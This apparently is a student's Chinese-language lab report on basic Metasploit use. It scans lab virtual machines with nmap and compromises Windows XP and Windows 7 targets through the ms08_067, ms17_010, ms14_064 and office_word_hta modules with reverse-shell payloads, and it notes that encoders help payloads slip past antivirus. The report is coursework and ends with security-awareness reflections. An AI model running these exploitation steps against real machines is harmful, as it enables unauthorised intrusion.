MSF基礎應用

模塊說明

exploit

這個是攻擊模塊,專門利用漏洞來打通鏈接的。以前的實驗已經作出了後門,可是都須要咱們手動傳輸到靶機並打開才行,這樣的話就須要社會工程學攻擊來輔助才能成功,由於別人的電腦不可能那麼配合咱們的。這時候就須要exploit模塊來幫咱們了,exploit模塊能夠利用漏洞幫咱們把payload送到靶機。面試

payload

是有效載荷,後面通常加要對靶機進行攻擊的代碼,包含了各類各樣調戲靶機的手段,能夠完成對靶機的各類操做,來完成咱們的攻擊目的。shell

encode

編碼器,對代碼進行異或運算、去除壞字符等等,保護payload不被發現。payload明目張膽的過去確定是要被殺的,而encode給payload整個容殺軟啥的就認不出payload了,因而payload才能安心幹壞事。windows

環境

主機:kali瀏覽器

靶機:windows xp SP3 english、windows 7 sp1 english安全

namp掃描

先給出namp經常使用的功能:

進行ping掃描,打印出對掃描作出響應的主機,不作進一步測試(如端口掃面或者操做系統探測):
nmap -sP 192.168.1.0/24
探測目標主機開放的端口,能夠指定一個以逗號分隔的端口列表(如-PS22,23,25,80):
nmap -PS 192.168.1.234
使用頻率最高的掃描選項:SYN掃描,又稱爲半開放掃描,它不打開一個徹底的TCP鏈接,執行得很快:
nmap -sS 192.168.1.0/24
肯定目標機支持哪些IP協議 (TCP,ICMP,IGMP等):
nmap -sO 192.168.1.19
探測目標主機的操做系統:
nmap -O 192.168.1.19
nmap -A 192.168.1.19
進行祕密SYN掃描,對象爲主機Saznme所在的「C類」網段的255臺主機。同時嘗試肯定每臺工做主機的操做系統類型。由於進行SYN掃描 和操做系統檢測,這個掃描須要有根權限。
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
 
由於不知道同網段哪些地址是有用的,因此先對同網段進行syn掃描,以後在對具體ip進行端口掃描,能夠節省時間。
 

 

其實這邊知道xp的ip是192.168.201.129,接着用nmap -PS 192.168.201.128來進行端口掃描,由於下面要用到ms08_067攻擊模塊進行攻擊,因此要確保445端口是打開的,也就是能夠ping通。結果發現xp防火牆打開的時候445是默認關閉的,因而把防火牆關掉再掃描能夠看見445端口已經打開。這樣第一步準備工做就差很少了。網絡

 

利用ms08_067進行滲透

在msfconsole下search先找到這個模塊而且use該模塊tcp

首先應當show targets查看該exploit模塊可攻擊的對象,不然可能白費功夫,咱們的xp是sp3 english,能夠被該模塊攻擊。工具

 

接下先設置payload,show payloads能夠列出該攻擊模塊支持的payload。這裏選了shell_reverse_tcp做爲payload。測試

以後設置一些必要的options,若是不知道設置哪些東西能夠先show options查看一下。對這個模塊和payload只須要設置設置回連ip和監聽ip就可使用了。編碼

set RHOST 192.168.201.129  #設置回連ip,即靶機ip
set LHOST 192.168.201.128  #設置監聽ip

而後exploit,大功告成

 

 利用永恆之藍ms17_010模塊攻擊win7 

先掛上攻擊成功的截圖

大概的攻擊流程以下

set payload xxx     #設置payload
set RHOST xxx      #設置目標ip
set LHOST xxx      #設置監聽ip
set smbuser xxx    #設置用戶名,靶機上的用戶
set smbpass xxx    #設置登陸密碼
exploit

這裏用的是ms17_010_psexec模塊,ms17_01還有ms17_010_eternalblue版本,當時是由於看到ms17_010_psexec模塊比較新因此用它。可是這個模塊還須要輸入用戶名密碼來實現攻擊,顯得不是很好用。而後查了百度說是有些ms17_010_eternalblue模塊能夠不用輸入用戶名和密碼來攻擊,而後本身親測瞭如下,從下圖看出應該是無法攻擊我這個系統,輸了帳號密碼也不行,看來新版本仍是靠譜一點。

用了這個漏洞感受沒想象的那麼強大,還要輸用戶名密碼,從另外一個角度看來,平時用電腦啥的多設置一個密碼真是好習慣。這個模塊提供了一個相似字典暴力破的東西,能夠經過管道輸入一堆用戶名用於測試來打通鏈接。因此相似「Administrator+空密碼」這類用戶就得遭殃了。

能想到用這個漏洞是由於在用openvas掃描後發現提示smb漏洞攻擊成功率很高,因此去msfconsole裏面search了一下就找到了。原本這個漏洞是但願拿來攻擊win10的,不過不行,target提示錯誤了。因而又拿去win7試了一下打通了。

 

openvas的安裝和使用老師的文檔裏講的很清楚,這裏不做贅述。

若是要更好的利用這個漏洞,能夠利用smb_ms17_010輔助模塊來掃描能夠攻擊的ip,這個輔助模塊在必定程度上彌補了須要用戶名密碼的缺陷。

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.201.0/24         #掃描192.168.201.0-192.168.201.255的ip
run

 

 

利用ms14_064針對瀏覽器攻擊

這個模塊是經過search browser隨便找出的一個,以前試了好幾個都很差用。還在exploit-db上下載了一個比較新的,由於是適用火狐44.0.2的,還特地下了,結果搞了半天出不告終果。

這些模塊用起來都差很少:

set SRVHOST xxx    #本身的ip
set payload xxx       #選一個合適的payload
set LHOST xxx         #本身的ip
exploit

和前面的主動攻擊不一樣的是須要在靶機上訪問生成的url,如上圖所示,這個url能夠本身設置。而後在xp系統中打開ie,輸入url訪問,在kali的msfconsole下就能夠看到結果了,以下圖。

 

這個漏洞targets裏面說能夠攻擊xp和win 7,不過親測只有xp能通。

 利用office_word_hta模塊攻擊win7

在windows/fileformat下面翻了很久找到這麼一個好用的模塊,也是爲了知足試驗要求。

看這個模塊的options能夠發現參數都有默認配置,其實直接就能夠用,要改也只須要改一下SRVHOST就能夠。

而後在win7上訪問下圖中的url測試,滲透成功。

show options就能夠知道應該配置哪些選項

exploit-db上導入模塊

首先在exploit-db上找到本身須要的模塊並下載,通常只有標有meterpreter下下來纔是能夠導入的.rb文件。找到meterpreter的module的路徑,只須要把.rb文件放到module裏面而後msfconsole從新導入就能夠了,不過最好能夠新建一個文件夾專門放本身的module。

拷貝進去以後打開msfconsle,

msf>   reload_all

結束後能夠use測試一下。

 

 實驗體會

此次實驗剛開始有點不知從何下手,聽老師說的去exploit-db上找個攻擊win10的模塊,不裝xp。結果忙活了大半天試了幾個啥反應都沒有,最後仍是放棄win10轉戰win7和xp。

我先是下了一個Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit),操做感受都ok,但是到最後win10瀏覽器打開連接出現幾個提示就沒反應了。後面又試了一個針對firefox瀏覽器44.0.2版本的攻擊,按它說明是windows平臺點開連接瀏覽器會崩並打開calc.exe,然而我本身試確實瀏覽器崩了啥反應沒有。。。

而後我就裝了xp照着實驗指導用ms08_067模塊試了一下,沒幾下就搞定了。對比以前最大的感覺就是這些meterpreter裝好的模塊的說明很詳細,基本上隨便一個模塊show targets + show options +show payloads就能夠直接用了,不行再打開.rb文件裏面看註釋也挺詳細的。但是exploit-db上的幫助和targets啥的根本看不出什麼東西,出錯了報錯也不完善,估計是別人剛開發就傳上去了,對新手太不友好了。

xp成功後我又開始對win10有想法了,而後利用端口掃描看打開的端口。針對這幾個端口我又測試了幾個模塊,依然gg,但是又以爲xp如今的使用率已經很低了,因而裝了個win7開搞。

而後用以前對win10用過的模塊在win7上面試了一下,結果就成功了,看來仍是要跟着時代走,該更新仍是要更新。

我以爲此次實驗其實難點根本就再也不攻擊模塊的使用,可否用好輔助模塊反而更關鍵。若是把輔助模塊用好了,就能少走不少彎路,避免不少沒必要要的工做。還有漏洞掃描工具openvas我是作了一半纔去使用它的,如今看來第一步就應該拿這個掃一遍,應該拿什麼模塊攻擊search一下全出來了。

作了此次實驗感受要實現局域網內的攻擊是比較容易的,聽了老師對網絡通訊的一個介紹後,感受要黑外網的電腦太難了,除非能把各個網關都黑掉,基本只能釣魚等着用戶本身去點。反過來看只要咱們不點不良連接,提升網絡安全意識,要被黑客給黑到真的是很難的。同時應該注意到局域網的安全性不是那麼有保障,應該少連一些路邊wifi,省得啥時候被黑了都不知道,還有就是操做系統的更新、漏洞的修復真的有用啊,我要是不更新win10,能是下面這個結果嗎(192.168.201.1就是個人win10),win7都不用下了。

相關文章
相關標籤/搜索